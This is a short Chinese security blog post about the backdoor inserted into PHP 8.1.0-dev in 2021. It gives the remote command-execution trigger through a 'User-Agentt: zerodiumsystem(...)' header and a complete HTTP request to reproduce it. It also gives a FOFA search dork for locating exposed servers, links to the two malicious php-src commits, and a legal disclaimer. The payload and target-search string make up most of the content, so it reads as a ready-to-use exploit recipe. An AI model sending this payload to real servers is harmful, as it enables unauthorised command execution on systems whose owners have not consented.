【后门】PHP 8.1.0-dev 命令执行漏洞

【后门】PHP 8.1.0-dev 命令执行漏洞

原创 漏洞推送 一个不正经的黑客 2023-11-25 20:05

免责声明本文所涉及的技术和方法仅供合法合规的目的参考和学习使用。严禁利用本文内容从事任何违法或未经授权的活动。如因个人非法使用所造成的任何不良后果,作者及本公众号概不负责

今天,继续讲一个鲜为人知但有价值的漏洞。

01

漏洞概述

01

HTTP Header User-Agentt 字段存在命令执行后门

payload: 

User-Agentt: zerodiumsystem('id');

02

FOFA Dork

02

FOFA Dork: “PHP/8.1.0-dev”

03

漏洞复现

03

GET / HTTP/1.1
User-Agentt: zerodiumsystem('echo 666pHp');
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

04

漏洞资料

04

PHP 8.1.0-dev版本于2021年3月28日发布时曾被发现存在后门问题。在php-src存储库中提交了两个恶意的代码更改,但随后被及时发现并成功清除。这一事件突显了对于软件安全的持续关注和及时响应的重要性。对于软件安全问题,我们建议及时关注官方通告,确保及时应用安全补丁,以维护系统和应用的稳健性

两个恶意提交Commit记录如下:

https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d

https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a

往期推荐

不要总想搞小新闻,这个漏洞千万不要看!

【简单】获取任意微信号的wxid_开头原始ID

推荐几个高质量公众号

Kinsing恶意软件利用Apache ActiveMQ漏洞进行加密货币挖矿

AI自动生成视频

令人深思!OpenAI  加剧互联网失业浪潮

点击下面阅读原文